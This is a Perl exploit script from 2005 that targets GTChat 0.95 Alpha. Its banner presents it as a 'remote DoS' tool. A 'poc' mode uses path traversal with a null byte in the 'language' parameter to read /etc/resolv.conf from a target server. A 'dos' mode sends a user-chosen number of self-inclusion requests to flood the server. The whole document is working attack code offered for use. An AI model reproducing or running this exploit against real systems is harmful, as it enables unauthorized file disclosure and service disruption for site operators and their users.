#!/usr/bin/perl use LWP::Simple; if (@ARGV < 3) { print "\nUsage: $0 [server] [path] [mode] [count for DoS]\n"; print "sever - URL chat\n"; print "path - path to chat.pl\n"; print "mode - poc or dos,\n"; print " poc - simple check without DoS and exit,\n"; print " dos - DoS, you must set count for requests in 4 argument.\n\n"; exit (); } $DoS = "dos"; $POC = "poc"; $server = $ARGV[0]; $path = $ARGV[1]; $mode = $ARGV[2]; $count = $ARGV[3]; print qq( ################################### # GTChat <= 0.95 Alpha remote DoS # # tested on GTChat 0.95 Alpha # # (c)oded by x97Rang 2005 RST/GHC # # Respect: b1f, 1dt.w0lf, ed # ################################### ); if ($mode eq $POC) { print "\n\nTry read file /etc/resolv.conf, maybe remote system unix...\n"; $URL = sprintf("http://%s%s/chat.pl?language=../../../../../../../../../../etc/resolv.conf%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); $content = get "$URL"; if ($content =~ /(domain|sortlist|options|search|nameserver|dhclient)/) { print "File read successfully, remote system is *nix and $server are VULNERABLE!\n"; exit(); } if ($content =~ /Fatal error/) { print "File read failed, but *Fatal error* returned, $server MAYBE vulnerable, check all output:\n"; print "=== OUTPUT ===============================================================================\n"; print "\n$content\n"; print "=============================================================================== OUTPUT ===\n"; exit(); } else { print "Hmm.. if you arguments right, then $server NOT vulnerable, go sleep :)\n"; } } if ($mode eq $DoS) { if (!($count)) { print "\nNeed count for DoS requests, you don't set it, exit...\n"; exit() } print "\nSend $count DoS requests to $server...\n"; $URL = sprintf("http://%s%schat.pl?language=chat.pl%00 HTTP/1.0\nHost: %s\nAccept:*/*\nConnection:close\n\n",$server,$path,$server); for ($count_ov = 0; $count_ov != $count; $count_ov++) { $content = get "$URL"; } print "Done, packets sended.\n"; }